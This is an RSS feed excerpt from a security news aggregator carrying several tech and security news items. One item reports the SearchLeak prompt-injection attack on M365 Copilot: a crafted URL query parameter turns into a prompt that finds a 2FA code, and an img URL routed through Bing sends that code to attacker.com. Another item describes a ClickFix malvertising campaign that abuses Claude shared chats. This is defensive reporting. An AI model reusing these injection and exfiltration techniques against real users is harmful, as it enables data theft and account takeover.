<description><![CDATA[Anfang September 2025 gab es die Aktion, bei der PayPal-Kunden zwölf Monate Perplexity Pro kostenlos nutzen konnten. Aktuell häufen sich jedoch Berichte, auch unter unseren Lesern, über massive technische Einschränkungen bei genau diesen Konten. Nutzer schauen in die Röhre, da...Zum Beitrag: Perp...]]></description>
<link>https://tsecurity.de/de/3609691/it-nachrichten/perplexity-pro-aerger-bei-der-gratis-aktion-fuer-paypal-kunden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609691/it-nachrichten/perplexity-pro-aerger-bei-der-gratis-aktion-fuer-paypal-kunden/</guid>
<pubDate>Fri, 19 Jun 2026 10:17:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Anfang September 2025 gab es die Aktion, bei der PayPal-Kunden zwölf Monate Perplexity Pro kostenlos nutzen konnten. Aktuell häufen sich jedoch Berichte, auch unter unseren Lesern, über massive technische Einschränkungen bei genau diesen Konten. Nutzer schauen in die Röhre, da...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/perplexity-pro-aerger-bei-der-gratis-aktion-fuer-paypal-kunden/">Perplexity Pro: Ärger bei der Gratis-Aktion für PayPal-Kunden</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[M365 Copilot SearchLeak: Your prompt injection attack surface just got bigger]]></title>
<description><![CDATA[A recent proof-of-concept attack against Microsoft’s M365 Copilot Enterprise highlights what could be a much broader prompt injection threat based on a common way many AI-enhanced web services operate.



Dubbed SearchLeak, the attack hinged on a typical malicious objective: to leak sensitive cor...]]></description>
<link>https://tsecurity.de/de/3609577/it-security-nachrichten/m365-copilot-searchleak-your-prompt-injection-attack-surface-just-got-bigger/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609577/it-security-nachrichten/m365-copilot-searchleak-your-prompt-injection-attack-surface-just-got-bigger/</guid>
<pubDate>Fri, 19 Jun 2026 09:08:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A recent proof-of-concept attack against Microsoft’s M365 Copilot Enterprise highlights what could be a much broader prompt injection threat based on a common way many AI-enhanced web services operate.</p>



<p>Dubbed SearchLeak, the attack hinged on a typical malicious objective: to leak sensitive corporate data by tricking employees to click on specially crafted links.</p>



<p>To carry out the attack, researchers combined three weaknesses in the Copilot Enterprise Search implementation — one of which stands out as a potential issue in other AI-enabled applications as well. Microsoft, which rated the information disclosure flaw as critical, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42824">patched the vulnerability</a> on the server side earlier this month, but the attack also shows the implications of AI-powered services having broad access to corporate assets on behalf of their users.</p>



<p>“Since SearchLeak targets the Enterprise tier of Microsoft, the blast radius isn’t limited to personal data — it’s able to surface anything the user has access to inside the organization including emails, meeting invites and notes, SharePoint documents, OneDrive files, and other indexed business content,” researchers from Varonis Threat Labs said in <a href="https://www.varonis.com/blog/searchleak">their report</a>. “Depending on how M365 is connected to the environment, the blast radius could extend even wider.”</p>



<h2 class="wp-block-heading">Parameter-to-prompt injection</h2>



<p>What makes the attack possble is the way Microsoft Copilot Enterprise Search operates.</p>



<p>As is common for search capabilities in many web applications, Copilot Search relies on URLs that contain a <code>?q=[query]</code> parameter. But because Copilot Search is AI-powered, the query parameter accepts natural language prompts, not just simple search queries.</p>



<p>“Turning a URL parameter into an AI instruction that silently exfiltrates data? That’s the AI-native piece,” the researchers said. “It’s the new attack surface that makes the classic bugs exploitable in a way they wouldn’t be otherwise, something we’ve now witnessed with SearchLeak and Reprompt.”</p>



<p><a href="https://www.varonis.com/blog/reprompt">Reprompt</a> is a similar attack Varonis researchers uncovered in Microsoft Copilot Personal and revealed this week. But there are other pecedents for what Varonis has dubbed as parameter-to-prompt (P2P) injection. Last October, researchers from LayerX revealed <a href="https://layerxsecurity.com/blog/cometjacking-how-one-click-can-turn-perplexitys-comet-ai-browser-against-you/">a prompt injection vulnerability in Perplexity’s Comet browser</a> that also relied on data leak instructions being passed to an AI-powered search engine via the q= parameter in URLs.</p>



<p>Even earlier, in July 2025, researchers from Tenable revealed <a href="https://www.tenable.com/security/research/tra-2025-22">a vulnerability in ChatGPT</a> that also used maliciously crafted URLs. With URL query parameters becoming a common way of enabling on-the-fly prompt execution in AI-powered applications, this attack vector might become more commonly exploited in the future.</p>



<p>“We did check many other LLMs, and some of them had a similar technique,” Mark Vaitsman, the security research team leader at Varonis, told CSO. “Some other LLMs have the option to use this type of technique, but are very strict about what can get in.”</p>



<h2 class="wp-block-heading">Getting the data out</h2>



<p>Getting an LLM to execute rogue prompts to access a company’s data is only one part of a succesful attack. The other requires finding ways to extract that data to an external server, because just tricking the web service to present data to the victim inside their browser does not inherintely pose any security risk. The user already can search and access that data.</p>



<p>One common exfiltration technique in prompt injection attacks is to abuse an AI-powered web application’s ability to render responses as HTML, given that HTML can include elements that require the browser to send requests to remote resources, such as <code>&lt;img&gt;</code> tags. By abusing such tags, attackers can force the data to be leaked via browser requests to a server under their control.</p>



<p>In the case of Copilot Enterprise Search, Microsoft had a guardrail in place that enclosed the LLM’s search responses inside <code>&lt;code&gt;</code> blocks, presenting it to the browser as text. Varonis researchers found, however, that this wrapping did not apply until after the model finished its thinking phase. The thinking process itself was still rendered as HTML in the user’s browser.</p>



<p>“This is a textbook race condition,” the researchers said. “The guardrail is a post-processing step applied to the final output, but the browser doesn’t wait for ‘final’ — it renders incrementally. By the time the sanitizer activates, the damage is done.”</p>



<p>Microsoft had a second guardrail, the Content Security Policy (CSP), that allows website owners to define what external domains can load resources into the page. In this case, the CSP for <code>m365.cloud.microsoft.com</code> also allowed resources from <code>*.bing.com</code>, Microsoft’s search engine.</p>



<p>It turns out that Bing’s Image Search supports an <code>imgurl=</code> URL parameter to fetch images from external servers. As a result, the researchers could use Bing’s Image Search as a proxy to leak the data.</p>



<p>The proof-of-concept attack chain developed by Varonis showed how a user’s two-factor authentication code sent via email could be leaked. First, they would craft a link to Copilot Enterprise Search that would instruct the service to search through the user’s mailbox for an email with the code, then store that code in a variable and formulate a response that includes an <code>&lt;img&gt;</code> with the source being <code>https://www.bing.com/images/searchbyimage?cbir=sbi&amp;imgurl=https://attacker.com/$variable/img.png</code>.</p>



<p>“Because Copilot Enterprise operates with the user’s full graph permissions, the attacker effectively inherits the victim’s access to the organization’s data, without ever authenticating,” the researchers found. “This enables account takeover and broader data theft scenarios without the victim’s knowing. No special privileges are needed on the attacker’s side, just a crafted URL and a single click from the victim.”</p>



<h2 class="wp-block-heading">Mitigating the broader implications</h2>



<p>What these POC attacks show is that developers of AI-powered web applications and services need to filter the type of prompts allowed through URL query parameters and sanitize output at render time, not as a post-processing step. CSP policies should also be reviewed for potential server-side request forgery (SSRF) risks through the whitelisted domains.</p>



<p>Organizations that use such services should train employees to be suspicious of links with long query parameters, especially if they’re encoded. Security teams should detect and block requests to URLs that contain HTML tags in them or instructions to embed data in those tags.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Perplexity Launches Brain, a Self-Improving Memory System That Builds a Context Graph of an Agent’s Work and Learns Overnight]]></title>
<description><![CDATA[Perplexity has launched Brain, a self-improving memory system for its Computer agent. Instead of remembering the user, Brain remembers the agent's work — what worked, what failed, and what corrections got made. It builds a traceable context graph, reviews it overnight, and reports early gains in ...]]></description>
<link>https://tsecurity.de/de/3608898/ai-nachrichten/perplexity-launches-brain-a-self-improving-memory-system-that-builds-a-context-graph-of-an-agents-work-and-learns-overnight/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608898/ai-nachrichten/perplexity-launches-brain-a-self-improving-memory-system-that-builds-a-context-graph-of-an-agents-work-and-learns-overnight/</guid>
<pubDate>Thu, 18 Jun 2026 22:33:30 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Perplexity has launched Brain, a self-improving memory system for its Computer agent. Instead of remembering the user, Brain remembers the agent's work — what worked, what failed, and what corrections got made. It builds a traceable context graph, reviews it overnight, and reports early gains in correctness, recall, and cost.</p>
<p>The post <a href="https://www.marktechpost.com/2026/06/18/perplexity-launches-brain/">Perplexity Launches Brain, a Self-Improving Memory System That Builds a Context Graph of an Agent’s Work and Learns Overnight</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Angular Signals in practice: Building a signal-first form in Angular]]></title>
<description><![CDATA[Understanding a reactivity model in the abstract is useful, but it is ultimately incomplete without seeing how it shapes real application code. Concepts such as state, derivation, and explicit dependencies only become meaningful when they influence how forms are built, validated, and maintained i...]]></description>
<link>https://tsecurity.de/de/3608234/ai-nachrichten/angular-signals-in-practice-building-a-signal-first-form-in-angular/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608234/ai-nachrichten/angular-signals-in-practice-building-a-signal-first-form-in-angular/</guid>
<pubDate>Thu, 18 Jun 2026 17:21:00 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Understanding a <a href="https://www.infoworld.com/article/2335507/reactive-javascript-the-evolution-of-front-end-architecture.html">reactivity</a> model in the abstract is useful, but it is ultimately incomplete without seeing how it shapes real application code. Concepts such as state, derivation, and explicit dependencies only become meaningful when they influence how forms are built, validated, and maintained in practice.</p>



<p>In two previous articles, “<a href="https://www.infoworld.com/article/4171858/angular-signal-forms-from-event-pipelines-to-signal-driven-state.html">Angular Signal Forms: From event pipelines to signal-driven state</a>” and “<a href="https://www.infoworld.com/article/4180890/angular-signals-explained-how-pull-based-reactivity-changes-how-we-model-state.html">Angular Signals explained: How pull-based reactivity changes how we model state</a>,” we reframed form behavior as a state-driven problem and examined Angular Signals as a pull-based reactivity model well-suited to that kind of work. The natural next step is to apply those ideas to an actual Angular form and observe how the architecture changes when state becomes the primary concern.</p>



<p>This article focuses on a concrete example: a modest but realistic registration form. Rather than introducing new concepts, the goal here is to make earlier ideas tangible. We will see how a signal-backed model reshapes validation, interaction state, and submission logic, and how much coordination logic simply disappears when form behavior is expressed declaratively.</p>



<p>The focus here is not on novelty or completeness, but on making the underlying ideas easier to reason about. By walking through a signal-first form from model definition to submission, we can evaluate whether this approach truly reduces complexity and where it introduces new trade-offs that teams should understand before adopting it more broadly.</p>



<h4 class="wp-block-heading">Read the series:</h4>



<ul class="wp-block-list">
<li><a href="https://www.infoworld.com/article/4171858/angular-signal-forms-from-event-pipelines-to-signal-driven-state.html">Angular Signal Forms: From event pipelines to signal-driven state</a></li>



<li><a href="https://www.infoworld.com/article/4180890/angular-signals-explained-how-pull-based-reactivity-changes-how-we-model-state.html">Angular Signals explained: How pull-based reactivity changes how we model state</a></li>



<li><a href="https://www.infoworld.com/article/4185924/angular-signals-in-practice-building-a-signal-first-form-in-angular.html" data-type="link" data-id="https://www.infoworld.com/article/4185924/angular-signals-in-practice-building-a-signal-first-form-in-angular.html">Angular Signals in practice: Building a signal-first form in Angular</a></li>
</ul>



<h2 class="wp-block-heading"><a></a>Implementing a signal-first registration form</h2>



<p>With the conceptual groundwork in place, we can now turn theory into a concrete implementation. In this section, we will build a fully working registration form using Angular’s Signal Forms API. This example is deliberately modest in scope, but it is designed to serve as the foundation for the rest of the series. Each subsequent article will extend this same example rather than introducing a new one.</p>



<p>The form collects an email address, a password, a confirmation password, and explicit acceptance of terms. While simple on the surface, this structure allows us to explore field-level validation, cross-field constraints, interaction state, and submission behavior, all without reverting to event-driven form logic.</p>



<h3 class="wp-block-heading"><a></a>Project setup and structure</h3>



<p>The example assumes a standard Angular application created with the Angular CLI and configured to use Signals (Angular 17+). The Signal Forms APIs (Angular 21+) live under @angular/forms/signals, which must be explicitly imported.</p>



<p><a href="https://github.com/sonukapoor/angular-signal-forms">https://github.com/sonukapoor/angular-signal-forms</a></p>



<p>The folder structure is intentionally conservative:</p>



<p>src/<br>  app/<br>    registration/<br>      registration.component.ts<br>      registration.component.html<br>      registration.model.ts</p>



<p>Separating the model from the component keeps form state independent of presentation. This becomes increasingly valuable as the form grows or is reused across multiple components.</p>



<h3 class="wp-block-heading"><a></a>Defining the form model</h3>



<p>We begin by defining the shape of the data that the form collects. This is a plain TypeScript interface with no Angular dependencies. Treating the form model as a simple data structure reinforces the idea that the form’s values are just state.</p>



<pre class="wp-block-code"><code>// registration.model.ts
export interface RegistrationData {
  email: string;
  password: string;
  confirmPassword: string;
  acceptedTerms: boolean;
}
</code></pre>



<p>This interface mirrors what would typically be sent to a back-end API. There is no duplication of state, no separate “form value” object, and no mapping required at submission time.</p>



<h3 class="wp-block-heading"><a></a>Creating the signal-backed form</h3>



<p>The form itself is created in the component using a writable signal as the source of truth. The <code>form()</code> function attaches form semantics validation, field state, and submission to that signal.</p>



<pre class="wp-block-code"><code>// registration.component.ts
import { CommonModule } from "@angular/common";
import { Component, signal } from "@angular/core";
import {
  email,
  form,
  FormField,
  required,
  submit,
} from "@angular/forms/signals";
import { RegistrationData } from "./registration.model";

@Component({
  selector: "app-registration",
  imports: [FormField, CommonModule],
  templateUrl: "./registration.html",
  styleUrl: "./registration.css",
})
export class Registration {
  readonly model = signal<registrationdata>({
    email: "",
    password: "",
    confirmPassword: "",
    acceptedTerms: false,
  });

  readonly registrationForm = form(this.model, (schema) =&gt; {
    required(schema.email, { message: "Email is required" });
    email(schema.email, { message: "Enter a valid email address" });

    required(schema.password, { message: "Password is required" });
    required(schema.confirmPassword, {
      message: "Please confirm your password",
    });

    required(schema.acceptedTerms, {
      message: "You must accept the terms to continue",
    });
  });

  async onSubmit(event?: Event) {
    event?.preventDefault();

    await submit(this.registrationForm, (value) =&gt; {
      console.log(value());
      // Mock Server Call
      return Promise.resolve([
        {
          kind: "EmailAlreadyExists",
          field: this.registrationForm.email,
          error: { kind: "server", message: "Email already taken" },
        },
      ]);
    });
  }
}
</registrationdata></code></pre>



<p>Several design decisions are worth noting.</p>



<p>First, the model signal is defined as read-only. All mutations to the model occur through form bindings, not ad hoc assignments in the component. This keeps the component declarative and avoids the temptation to manipulate form state imperatively.</p>



<p>Second, validation is declared in one place. The schema function describes constraints on the model without introducing control trees, validator arrays, or observable pipelines. Angular takes responsibility for re-running validation whenever the model changes.</p>



<p>Finally, submission logic is explicit. The <code>submit()</code> helper ensures that the form is valid before invoking the callback, and it passes the current model value directly. There is no need to check flags or manually extract values.</p>



<h3 class="wp-block-heading"><a></a>Binding the form to the template</h3>



<p>With the form defined, the next step is to bind it to the template. Signal Forms provide the <code>[formField]</code> directive, which connects an input element directly to a field in the form schema.</p>



<pre class="wp-block-code"><code><!-- registration.component.html -->

  <div>
    <label>Email</label>
    

    @if (
      registrationForm.email().invalid() &amp;&amp; registrationForm.email().touched()
    ) {
      <p class="error">
        {{ registrationForm.email().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    <label>Password</label>
    

    @if (
      registrationForm.password().invalid() &amp;&amp;
      registrationForm.password().touched()
    ) {
      <p class="error">
        {{ registrationForm.password().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    <label>Confirm Password</label>
    

    @if (
      registrationForm.confirmPassword().invalid() &amp;&amp;
      registrationForm.confirmPassword().touched()
    ) {
      <p class="error">
        {{ registrationForm.confirmPassword().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    <label>
      
      I accept the terms and conditions
    </label>

    @if (
      registrationForm.acceptedTerms().invalid() &amp;&amp;
      registrationForm.acceptedTerms().touched()
    ) {
      <p class="error">
        {{ registrationForm.acceptedTerms().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    @if (registrationForm().errors().length &gt; 0) {
      <div class="error">
        @for (error of registrationForm().errors(); track error.message) {
          <p>{{ error.kind }}</p>
        }
      </div>
    }
  </div>

  <button type="submit">
    Register
  </button>

</code></pre>



<p>What stands out here is the absence of indirection. Each input binds directly to a field. Validation state is accessed through signals such as <code>invalid()</code> and <code>touched()</code>. Error messages are read from a structured error object, not reconstructed manually.</p>



<p>This template contains no subscriptions, no async pipes, and no event handlers for value changes. The UI simply reflects the current form state.</p>



<h3 class="wp-block-heading"><a></a>Interaction state and user experience</h3>



<p>One of the common criticisms of declarative form models is that they obscure user interaction logic. Signal Forms address this directly by exposing interaction metadata as signals.</p>



<p>The <code>touched()</code> signal determines whether a field has been interacted with. By combining it with <code>invalid()</code>, we control when validation messages appear. This logic remains purely declarative: the template describes when errors should be visible, and Angular ensures the signals stay up-to-date.</p>



<p>The disabled state of the submit button is derived from <code>registrationForm.invalid()</code>. There is no need to manually enable or disable it in response to events. If the form becomes valid, the button is enabled automatically.</p>



<h3 class="wp-block-heading"><a></a>Why this scales</h3>



<p>Even at this early stage, several advantages of a signal-first form model are apparent. The form’s behavior is expressed in terms of state and derivation, not events. The model, validation rules, and UI bindings are clearly separated. There is no duplication of logic between the component and the template.</p>



<p>As the form grows, this structure holds. Additional fields introduce additional schema entries and template bindings, not new subscription logic. Cross-field validation can be added declaratively. Asynchronous validation and persistence can be layered on without rewriting the core model.</p>



<p>Most importantly, the form remains inspectable. At any point during execution, the model signal reflects the current state of the form. Derived state validity, errors, and UI flags can be understood by reading the code, not by tracing runtime behavior.</p>



<h2 class="wp-block-heading"><a></a>What we did not solve yet (and why)</h2>



<p>At this stage, it would be easy to walk away with the impression that Signal Forms eliminates most of the hard problems associated with form handling. That impression would be misleading. What we have built so far is intentionally incomplete, not because the approach falls short, but because introducing too much too early obscures the value of the underlying model.</p>



<p>One area we have deliberately postponed is cross-field validation that expresses richer business rules. Many real-world forms depend on relationships between fields rather than isolated constraints. Password confirmation is a familiar example, but more complex scenarios quickly arise in enterprise applications. While Signal Forms support these patterns, introducing them before establishing a clear understanding of derived state risks turns validation back into an imperative exercise rather than a declarative one.</p>



<p>We have also avoided asynchronous validation. Server-backed checks introduce latency, partial failure, cancellation, and race conditions. These are not trivial concerns, and treating them casually often leads to subtle bugs and confusing user experiences. Although Signal Forms provide the necessary hooks to model asynchronous behavior, doing so responsibly requires a careful discussion of pending state, effects, and life-cycle boundaries. That discussion belongs in its own article.</p>



<p>Another omission is persistence and synchronization. Many forms need to autosave drafts, synchronize state with local storage, or react to changes by triggering external side effects. These behaviors are not part of the form state itself; they are consequences of state changes. Treating them as such is essential to keeping the architecture comprehensible. Introducing persistence too early would blur the distinction between state and reaction that this article has worked to establish.</p>



<p>Finally, this article has not addressed migration and interoperability. Few teams are starting from a blank slate. Most will adopt Signal Forms incrementally within applications that already rely on reactive forms or template-driven forms. Hybrid approaches, bridging strategies, and gradual refactors are all critical topics, but they presuppose familiarity with both paradigms. Addressing migration before establishing a solid signal-first mental model would undermine that foundation.</p>



<p>These omissions are intentional. A form architecture that tries to do everything at once often ends up doing nothing clearly. By focusing on the core ideas of state, derivation, and declarative validation, we create a base that can absorb additional complexity without collapsing under it.</p>



<h2 class="wp-block-heading"><a></a>Signal Forms in the context of Angular’s evolution</h2>



<p>To fully appreciate Signal Forms, it helps to step back and view them not as an isolated feature, but as part of a broader shift in Angular’s design philosophy.</p>



<p>For much of its history, Angular emphasized declarative templates paired with imperative coordination in component classes. RxJS became the backbone of that coordination, providing a powerful abstraction for handling asynchronous workflows, user input, and external events. This model scaled well, but it also encouraged developers to express state indirectly through streams and subscriptions.</p>



<p>Signals represent a deliberate recalibration. They re-center Angular’s reactivity model around state and derivation, rather than events and emissions. This shift is visible across the framework: in component inputs, change detection, and now forms. Signal Forms are not an attempt to replace everything that came before; they are an attempt to make the most common use case, modeling and deriving state, simpler and more explicit.</p>



<p>Framed this way, the design of Signal Forms aligns more closely with state-driven form behavior. The requirement to start with a model signal reflects the idea that the state should have a single, inspectable source of truth. Schema-based validation aligns with the notion that constraints are properties of state, not behaviors triggered by events. Field state exposed as signals reinforces the idea that validity, errors, and interaction metadata are derived values that should be read, not managed.</p>



<p>It is also worth noting that Signal Forms do <em>not</em> attempt to abstract away form behavior. They do not hide form state behind opaque classes or life-cycle hooks. They do not require developers to think in terms of control hierarchies or subscription graphs. Instead, they expose form behavior directly, making it easier to reason about how values, validation, and UI feedback relate to one another.</p>



<p>This approach aligns closely with other recent changes in Angular, including the introduction of modern template control flow and a stronger emphasis on explicit data dependencies. Together, these features point toward a framework that favors clarity over indirection and composition over orchestration.</p>



<p>Importantly, Signal Forms are still evolving. Their APIs may change, and their surface area will almost certainly expand. That is precisely why grounding them in first principles matters. Developers who understand <em>why</em> Signal Forms work the way they do will be far better equipped to adapt as the APIs mature.</p>



<p>This article has intentionally avoided duplicating documentation or enumerating every available feature. Instead, it has focused on establishing a conceptual framework that makes the official APIs feel intuitive rather than surprising. When viewed this way, Signal Forms are not a new way to write forms; they are a clearer expression of what forms have always been.</p>



<h2 class="wp-block-heading"><a></a>A new way to think about forms</h2>



<p>Building the registration form in this article reveals a quiet but important shift. The reduction in complexity does not come from fewer features or simpler requirements. It comes from expressing form behavior in terms of state and derivation rather than orchestration and reaction.</p>



<p>By treating the data model as the single source of truth, validation rules as declarative constraints, and UI behavior as derived from current conditions, much of the coordination logic that typically surrounds forms becomes unnecessary. There are fewer subscriptions to manage, fewer flags to synchronize, and fewer life-cycle concerns to reason about. Form behavior becomes easier to inspect because it is visible directly in the relationships between values.</p>



<p>This approach does not eliminate the hard problems associated with forms. Asynchronous validation, persistence, and interoperability with existing Angular Forms APIs still require careful design. What changes is where that complexity lives. Instead of being interwoven with state representation, those concerns are layered explicitly on top of a clear foundation.</p>



<p>Signal-first forms are not a universal replacement for existing patterns, nor are they a shortcut to simpler applications. They are, however, a strong example of how aligning APIs with first principles can reduce cognitive overhead and improve maintainability over time. For teams building large, state-heavy forms, this alignment can make the difference between code that merely works and code that continues to evolve without friction.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Attackers abuse Google Ads, GitLab, and Claude to deliver malware]]></title>
<description><![CDATA[Threat actors are abusing trusted platforms, including Google Ads, GitLab pages, and Claude’s shared chat feature, to trick users into executing malicious commands on their systems.



Disguised as popular AI developer tools, the threat actors used ClickFix social engineering attacks, where victi...]]></description>
<link>https://tsecurity.de/de/3607819/it-security-nachrichten/attackers-abuse-google-ads-gitlab-and-claude-to-deliver-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607819/it-security-nachrichten/attackers-abuse-google-ads-gitlab-and-claude-to-deliver-malware/</guid>
<pubDate>Thu, 18 Jun 2026 14:54:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Threat actors are abusing trusted platforms, including Google Ads, GitLab pages, and Claude’s shared chat feature, to trick users into executing malicious commands on their systems.</p>



<p>Disguised as popular AI developer tools, the threat actors used ClickFix social engineering attacks, where victims were tricked into manually executing malicious commands. Typically, this involved copying and pasting PowerShell or terminal commands, <a href="https://www.trendmicro.com/en/research/26/f/claudeai-shared-chat-abused-in-malvertising.html" target="_blank" rel="noreferrer noopener">noted</a> researchers at TrendAI.</p>



<p>The campaign funnelled more than 2,000 victims from sponsored Google search results for popular AI developer tools to malicious download pages before leveraging the claude.ai shared-chat feature as another stage in the attack chain.</p>



<p>The campaign demonstrates how threat actors are exploiting trust in widely used AI platforms to make social-engineering attacks more convincing and harder to detect.</p>



<h2 class="wp-block-heading">Inside the six-wave campaign</h2>



<p>Unlike traditional malware campaigns that rely on suspicious domains or fake download websites, this attack chain was built almost entirely on legitimate services. The threat actors used 92 unique malicious hostnames across GitLab pages, impersonated legitimate brand names including ChatGPT Codex, Perplexity, <a href="https://www.csoonline.com/article/4164250/critical-cursor-bug-could-turn-routine-git-into-rce.html?utm=hybrid_search">Cursor IDE</a>, JetBrains, Claude AI, and <a href="https://www.csoonline.com/article/4168867/claude-in-chrome-is-taking-orders-from-the-wrong-extensions.html?utm=hybrid_search">claude.ai</a>, and simultaneously ran Mac utility scam lures.</p>



<p>The campaign was spread across seven weeks, where weekly campaigns introduced new pages and keywords.</p>



<p>The first wave of the campaign launched between April 8-13, with claude-code-app.gitlab[.]io as the primary lure, supported by claudeapp.gitlab[.]io. Simultaneously, Mac utility-themed lures (mac-clean-storage.gitlab[.]io, mac-guide-tool.gitlab[.]io) were also found to have been deployed. During this wave, a single Google Ads campaign ID (23736589328) resulted in driving the majority of the traffic.</p>



<p>During the next wave spanning April 14-21, the campaign was diversified with the new Claude-themed variants, including gitlab.io domain (claude-tool-app, claud-desktop-app, claudesktop, claude-desktop-apps) alongside expanded Mac utility lures (macsupp-group, macsupp-usb, jetbrains-apps-group).</p>



<p>The brand impersonation was expanded during the third wave with the introduction of perplexity-platform.gitlab.io and chatgpt-codex.gitlab[.]io, while also creating claude-desktop-lm.gitlab[.]io  and cladesktop.gitlab[.]io.</p>



<p>During the fourth wave between April 29 and May 5, the operators pivoted significantly toward ChatGPT and <a href="https://www.csoonline.com/article/4142354/openai-says-codex-security-found-11000-high-impact-bugs-in-a-month.html?utm=hybrid_search">Codex</a> branding with codexgpt.gitlab[.]io , chatgpt-codex-app.gitlab[.]io, and chatgpt-codex-lm.gitlab[.]io, while the Claude-themed attacks continued.</p>



<p>In the fifth wave, spanning May 6-14, the threat actors moved their campaign from self-hosted GitLab Pages to abusing claude.ai’s legitimate shared chat feature. For this, claude.ai’s “share” feature was leveraged to create persistent, publicly accessible URLs on a fully trusted domain and then used Google Ads to direct victims to these weaponized pages, claimed the research. </p>



<p>During the sixth wave, between May 21 and June 14, the threat actors had completely shifted to claude.ai’s shared chat feature.</p>



<p>The campaign appears to have been designed primarily to target developers and technical users, say experts.</p>



<p>“An interaction with a Claude can be perceived as reliable because the users have become accustomed to considering AI tools as sources of productivity tips and technical advice. In this scenario, when users are provided with harmful instructions via an AI platform, there is a good chance that they will comply with them automatically,” explained Devroop Dhar, co-founder and India CEO at Primus Partners.</p>



<h2 class="wp-block-heading">Reputation-based defenses fell short</h2>



<p>Security experts say the campaign’s success stemmed from its ability to leverage trusted platforms at every stage of the attack chain, making malicious activity appear like normal user behavior.</p>



<p>“What makes this attack chain particularly effective is that it does not ask the victim to trust something obviously suspicious. Instead, it borrows trust from familiar brands, legitimate ad infrastructure, reputable hosting, and an AI platform that many developers already use in their daily workflow. This reduced the psychological friction that normally makes users pause before clicking or executing something,” said Amit Jaju, senior managing director at Ankura Consulting.</p>



<p>This is also a strong example of trust stacking. Each layer looks individually legitimate, so the full chain appears safer than it really is, added Jaju.</p>



<p>By leveraging platforms that organizations routinely allow and trust, the attackers were able to blend malicious activity into normal user workflows, making detection significantly more difficult.</p>



<p>Dhar added that in most cases, access to applications such as Google, GitLab, and AI applications is not blocked, as this could hinder operations within an organization. The reputation-based security systems cannot work efficiently here since the domain in question is seen as a reputable one, meaning security personnel will have to dig deeper into behaviour and user actions.</p>



<h2 class="wp-block-heading">Breaking the attack chain</h2>



<p>If a developer falls victim, the blast radius can be much larger than a normal user compromise. Jaju warned that a developer machine often contains browser session cookies, SSO tokens, SSH keys, Git credentials, source code, cloud CLI tokens, package manager credentials, secrets stored in local files, and access to internal documentation or collaboration platforms. </p>



<p>From there, attackers can move into code repositories, <a href="https://www.csoonline.com/article/4165420/sap-npm-package-attack-highlights-risks-in-developer-tools-and-ci-cd-pipelines.html?utm=hybrid_search">CI/CD pipelines</a>, cloud environments, container registries, ticketing systems, and enterprise messaging platforms. In some cases, they may not need to steal passwords at all because session tokens or authenticated browser sessions are enough to bypass part of the security stack.</p>



<p>While the campaign relied heavily on trusted platforms, organizations can still disrupt attacks at multiple points.</p>



<p>Dhar noted the first thing to understand here is that not all cyberattacks necessarily require malicious software. Nowadays, more and more attackers try to persuade victims into performing actions by themselves. Hence, one solution might be limiting unnecessary administrative privileges, monitoring shell and PowerShell executions, and detecting any suspicious behaviour. Additionally, developer PCs might need to be monitored because of the high level of access they have.</p>



<p>From a control standpoint, enterprises should restrict local admin rights and enforce least privilege on developer endpoints. They should also segment developer environments and separate high-risk browsing from privileged engineering workflows, where feasible, added Jaju.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Baltimore Mayor Pressures Apple Over Towson Store Closure]]></title>
<description><![CDATA[Baltimore Mayor Brandon M. Scott has added fresh pressure on Apple over its decision to close the Apple Towson Town Center store, which became the first unionized Apple Store in the United States.



Apple plans to permanently close the Towson store on June 20, along with two other retail locatio...]]></description>
